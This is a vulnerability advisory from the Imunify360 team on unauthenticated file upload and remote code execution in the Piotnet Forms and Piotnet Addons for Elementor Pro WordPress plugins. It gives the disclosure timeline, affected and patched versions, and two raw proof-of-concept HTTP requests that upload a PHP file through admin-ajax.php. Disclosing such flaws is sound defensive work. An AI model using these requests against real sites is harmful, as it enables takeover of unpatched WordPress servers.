Recently, the Imunify360 team discovered high severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro Plugins. Sergey Brazhnik, Security Analyst from Imunify360 Web Protection Team conducted a detailed analysis of Piotnet forms and addons vulnerabilities. Keep on reading to find out more about the following:
On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins upload directory and execute the uploaded scripts.
Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360.
The Piotnet developers were provided with a detailed report on July 7, 2021, and followed up with PoC and recommendations on August 25, 2021. Since there were no updates from developers, the Wordpress.org plugins team was informed about a vulnerable free plugin version available on https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021, as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.
Finally, on October 13, 2021, Pitonet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).
Description: Unauthenticated File Upload and RCE in Piotnet Forms
Affected Plugin: Piotnet Forms
Affected Versions: <= 1.0.22
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.0.23
Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro
Affected Plugin: Piotnet Forms Pro
Affected Versions: <=1.1.13
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.1.14
For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:
|
piotnetforms_ajax_form_builder |
Vulnerable file:
|
inc/forms/ajax-form-builder.php |
The function is allowed for non-authenticated users:
Furthermore, there is no validation for parameters required by this function like post_id and form_id, and for an attack to be successful the parameters just should be transferred.
Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload different extension files and execute them further.
PoC:
|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: vuln_domain.com Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=--------205816383 Content-Length: 645 Origin: http://vuln_domain.com Connection: close ----------205816383 Content-Disposition: form-data; name="action" piotnetforms_ajax_form_builder ----------205816383 Content-Disposition: form-data; name="post_id" 11111 ----------205816383 Content-Disposition: form-data; name="form_id" d253bdb1 ----------205816383 Content-Disposition: form-data; name="fields" [] ----------205816383 Content-Disposition: form-data; name="referrer" http://domain.com/?page_id=2 ----------205816383 Content-Disposition: form-data; name="file[]"; filename="file.php" Content-Type: application/octet-stream <?php echo("PoC for vulnerability is confirmed"); ?> ----------205816383-- |
Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro
Affected Plugin: Piotnet Addons for Elementor Pro
Affected Versions: <=6.4.11
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 6.4.12
For Piotnet Addons For Elementor Pro, the case is quite similar, except the function name is pafe_ajax_form_builder and the uploads directory in /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.
PoC:
|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: vuln_domain.com Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=--------205816383 Content-Length: 645 Origin: http://vuln_domain.com Connection: close ----------205816383 Content-Disposition: form-data; name="action" pafe_ajax_form_builder ----------205816383 Content-Disposition: form-data; name="post_id" 11111 ----------205816383 Content-Disposition: form-data; name="form_id" d253bdb1 ----------205816383 Content-Disposition: form-data; name="fields" [] ----------205816383 Content-Disposition: form-data; name="referrer" http://domain.com/?page_id=2 ----------205816383 Content-Disposition: form-data; name="file[]"; filename="file.php" Content-Type: application/octet-stream <?php echo("PoC for vulnerability is confirmed"); ?> ----------205816383-- |
To protect your servers from vulnerabilities exploitation we strongly recommend:
Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.